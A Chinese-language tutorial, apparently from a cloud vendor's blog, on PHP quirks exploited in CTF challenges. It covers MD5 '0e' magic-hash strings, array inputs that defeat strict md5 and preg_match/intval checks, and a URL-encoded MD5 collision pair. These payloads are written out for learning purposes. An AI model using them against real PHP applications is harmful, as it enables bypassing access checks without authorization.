溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

CTF中的PHP特性函數(shù)實(shí)例分析

發(fā)布時間:2023-02-24 16:09:03 來源:億速云 閱讀:102 作者:iii 欄目:開發(fā)技術(shù)

這篇文章主要介紹“CTF中的PHP特性函數(shù)實(shí)例分析”的相關(guān)知識,小編通過實(shí)際案例向大家展示操作過程,操作方法簡單快捷,實(shí)用性強(qiáng),希望這篇“CTF中的PHP特性函數(shù)實(shí)例分析”文章能幫助大家解決問題。

MD5強(qiáng)弱碰撞

CTF中的PHP特性函數(shù)實(shí)例分析

對于MD5加密大家一定很熟悉,在PHP里同樣存在函數(shù)MD5,該函數(shù)可以將指定的字符串通過哈希函數(shù)轉(zhuǎn)為復(fù)雜的加密字符串。在CTF中有著關(guān)于MD5的最基本的知識,即強(qiáng)/弱類型比較。

弱類型比較

觀察以下代碼:

if(md5($_GET['a'])==md5($_GET['b']))
echo $xino;

可以看到比較時有兩個等號,我們要怎樣讓他們相等呢?根據(jù)php弱類型比較特性,當(dāng)兩個等于號時,會將變量轉(zhuǎn)化為同類型,那么我們可以思考,如果把傳入的數(shù)據(jù)改成md5加密后都為開頭0e的字符串是不是就可以繞過了,因?yàn)檫@樣會被認(rèn)為是科學(xué)計數(shù)法,不管加什么都永遠(yuǎn)是0,我們也就繞過了,這里舉幾個字符串md5加密后都為0e的:

NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
s878926199a:0e545993274517709034328855841020
s1091221200a:0e940624217856561557816327384675

強(qiáng)類型比較

觀察下面代碼:

if (md5($_POST['a']) === md5($_POST['b']))
echo xino;

如果我們等號變成三個還可以用上面方法繞過嗎?答案是否定的,因?yàn)槿齻€等號在PHP里意味著強(qiáng)類型比較,上面的方法因?yàn)?e后面數(shù)據(jù)不同便不可行了,于是這里可以用數(shù)組來繞過,因?yàn)镻HP特性允許接受數(shù)組,而數(shù)組在MD5加密后為NULL,于是借助這個特性可以進(jìn)行繞過。

我們可以傳入下面的PAYLOAD繞過:

a[]=a&b[]=b

強(qiáng)碰撞

難度進(jìn)一步升級,如果我們要面對的是以下代碼呢:

$a = (string)$_GET['a'];
$b = (string)$_GET['b'];
if (md5($a) === md5($b)) {
die('OK');
}

因?yàn)閺?qiáng)制類型轉(zhuǎn)換的原因,我們不能像上面一樣傳入數(shù)組了,于是需要進(jìn)行MD5強(qiáng)碰撞,及內(nèi)容不同而MD5值要相同,這就很難辦了,但是我們可以用工具生成,這里給大家舉一個可行的例子:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

preg_match()

CTF中的PHP特性函數(shù)實(shí)例分析

這是一個正則表達(dá)式函數(shù),簡單來說會對我們設(shè)置的數(shù)據(jù)進(jìn)行匹配,比如:

<?php 
if (preg_match("/xino/i", "XINO IS A BOY .")){ 
echo "查找到匹配的字符串 php。"; } 
else { echo "未發(fā)現(xiàn)匹配的字符串 php。"; } ?>

因?yàn)槲覀冇?i設(shè)置了大小寫不敏感,所以可以找到匹配字符串,所以會返回查詢到的字符串,下面我們看看如何繞過。

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

其中intval的作用是取整,可以看到正則過濾了數(shù)字,但由于PHP特性,該函數(shù)只能處理字符串,于是我們可以傳入數(shù)組進(jìn)行繞過:

?num[]=1

提交后成功echo出了flag,繞過成功。

關(guān)于“CTF中的PHP特性函數(shù)實(shí)例分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識,可以關(guān)注億速云行業(yè)資訊頻道,小編每天都會為大家更新不同的知識點(diǎn)。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI